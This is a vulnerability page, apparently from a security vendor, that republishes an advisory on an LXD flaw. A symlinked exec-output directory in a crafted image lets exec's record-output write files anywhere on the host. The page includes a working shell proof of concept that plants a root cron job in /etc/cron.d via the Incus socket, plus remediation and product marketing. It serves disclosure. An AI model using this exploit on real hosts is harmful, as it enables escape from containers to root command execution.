GHSA-9J25-MM2H-2F76

GHSA-9J25-MM2H-2F76 is a critical-severity security vulnerability in github.com/canonical/lxd (go), affecting versions < 0.0.0-20260626085134-124f90100640. It is fixed in 0.0.0-20260626085134-124f90100640.

Does this CVE actually affect you?

Kodem shows which CVEs are reachable and running in your applications, so you fix what's exploitable, not just what's listed.

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.

Runtime intelligence, not another scanner.

Summary

LXD has arbitrary file write on host via exec-output symlink in crafted image

Reported from https://github.com/lxc/incus/security/advisories/GHSA-48q5-w887-33wv

The record-output parameter of the /instances/$name/exec endpoint
stores the output of the command in the exec-output directory of the
instance. If exec-output is a symlink, file named exec_UUID.stdout
and exec_UUID.stderr can be written to an arbitrary location where
the .stdout file will contain arbitrary content. This behavior can be
abused for arbitrary command execution.

Details

When an image is unpacked, top-level symlinks are extracted as is;
allowing for exec-output to be placed on disk. In instance_exec.go,
os.Mkdir continues of exec-output exists and os.OpenFile follows
the exec-output symlink.

PoC

Below, we place the exec_UUID.stdout file in /etc/cron.d on
the host for arbitrary command execution.

#!/bin/sh
# usage: $0 existing-imagefp
set -eu

basefp="${1}"

die() {
        printf '%s' "${@}" >&2
        exit 1
}

command -v curl >/dev/null 2>&1 || die 'error: curl not found\n'
command -v python3 >/dev/null 2>&1 || die 'error: python3 not found\n'

tmpdir=$(mktemp -d)
cleanup() {
        rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP


# insert exec-output symlink

incus image export "${basefp}" "${tmpdir}/img"

mkdir "${tmpdir}/repack"
cd "${tmpdir}/repack"

xz -cd "${tmpdir}/img" | tar -f- -vx

rm -rf exec-output
ln -s /etc/cron.d exec-output

tar -f- -c * | gzip -c9 >"${tmpdir}/img"

cd - >/dev/null
incus image import "${tmpdir}"/img* --alias afw-exec-output


# Launch container, exec with record-output via REST API
incus launch afw-exec-output afw-exec-output
incus wait afw-exec-output ip

OP=$(curl -s --unix-socket /var/lib/incus/unix.socket \
  -X POST -H 'Content-Type: application/json' \
  -d '{"command":["/bin/sh","-c","echo * * * * * root id'"'>'"'/afw-exec-output"],"record-output":true}' \
  "lxd/1.0/instances/afw-exec-output/exec" | python3 -c "import sys,json;print(json.load(sys.stdin)['operation'])")

curl -s --unix-socket /var/lib/incus/unix.socket "$OP/wait?timeout=30" >/dev/null

#find /etc/cron.d/exec_* -exec cat {} \;

Impact

Constrained file creation in an arbitrary directory on the host via
via an unsanitized symlink; possibly leading to command execution.

GHSA-9J25-MM2H-2F76 has a CVSS score of 9.9 (Critical). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260626085134-124f90100640); upgrading removes the vulnerable code path.

Affected versions

github.com/canonical/lxd (< 0.0.0-20260626085134-124f90100640)

Security releases

github.com/canonical/lxd → 0.0.0-20260626085134-124f90100640 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

Already deployed Kodem?

See it in your environmentNew to Kodem? Get a demo →

Remediation advice

Upgrade github.com/canonical/lxd to 0.0.0-20260626085134-124f90100640 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is GHSA-9J25-MM2H-2F76? GHSA-9J25-MM2H-2F76 is a critical-severity security vulnerability in github.com/canonical/lxd (go), affecting versions < 0.0.0-20260626085134-124f90100640. It is fixed in 0.0.0-20260626085134-124f90100640.
  2. How severe is GHSA-9J25-MM2H-2F76? GHSA-9J25-MM2H-2F76 has a CVSS score of 9.9 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/canonical/lxd are affected by GHSA-9J25-MM2H-2F76? github.com/canonical/lxd (go) versions < 0.0.0-20260626085134-124f90100640 is affected.
  4. Is there a fix for GHSA-9J25-MM2H-2F76? Yes. GHSA-9J25-MM2H-2F76 is fixed in 0.0.0-20260626085134-124f90100640. Upgrade to this version or later.
  5. Is GHSA-9J25-MM2H-2F76 exploitable, and should I be worried? Whether GHSA-9J25-MM2H-2F76 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether GHSA-9J25-MM2H-2F76 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix GHSA-9J25-MM2H-2F76? Upgrade github.com/canonical/lxd to 0.0.0-20260626085134-124f90100640 or later.

Other vulnerabilities in github.com/canonical/lxd

Stop the waste.
Protect your environment with Kodem.